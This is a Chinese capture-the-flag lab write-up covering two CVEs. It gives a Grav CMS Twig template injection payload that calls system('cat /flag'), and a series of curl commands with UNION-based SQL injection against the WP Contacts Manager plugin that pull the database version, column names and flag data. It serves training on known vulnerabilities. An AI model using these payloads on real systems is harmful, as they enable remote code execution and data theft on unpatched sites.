【春秋云境】CVE-2022-2073靶场WP和CVE-2022-1014靶场WP

【春秋云境】CVE-2022-2073靶场WP

网站地址：https://yunjing.ichunqiu.com/

渗透测试

1.已知提示

• Grav CMS 可以通过 Twig 来进行页面的渲染，使用了不安全的配置可以达到远程代码执行的效果，影响最新版 v1.7.34 以下的版本

2.开启靶场

3.创建用户

• 在打开的靶场页面注册一个账户，填写完信息之后点击Create User即可

  

4.执行代码

• 点击Pages–>Home，输入代码，点击Save

  {{['cat\x20/flag']|filter('system')}}
  

  
  

5.获得flag

• 访问首页获得flag
  

【春秋云境】CVE-2022-1014靶场WP

网站地址：https://yunjing.ichunqiu.com/

渗透测试

1.已知提示

• wordpress插件 WP Contacts Manager <= 2.2.4 对用户输入的转义不够充分，导致了SQL注入。

2.开启靶场

3.漏洞存在位置

• 漏洞路径/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact
  

4.sql注入

• 查看数据库版本

  curl 'http://eci-2ze173nkohbajx7g2j3c.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \
  	--data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT version()),3,4,5,6,7,8,9,0,1,2; -- "}'
  

  数据库版本为10.5.15-MariaDB-0+deb11u1
  

• 爆库

  curl 'http://eci-2ze173nkohbajx7g2j3c.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \
  	--data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT database()),3,4,5,6,7,8,9,0,1,2; -- "}'
  

  数据库名ctf
  

• 爆表

  http://eci-2ze173nkohbajx7g2j3c.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact
  

  发现一个名为flag的表

  

• 爆字段

  curl 'http://eci-2ze173nkohbajx7g2j3c.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \
          --data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT group_concat(column_name) from information_schema.columns where table_name=0x666c6167),3,4,5,6,7,8,9,0,1,2; -- "}'
  

  发现字段名为flag

  

• 爆数据

  curl 'http://eci-2ze173nkohbajx7g2j3c.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \
          --data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT group_concat(flag) from flag),3,4,5,6,7,8,9,0,1,2; -- "}'
  

  获得flag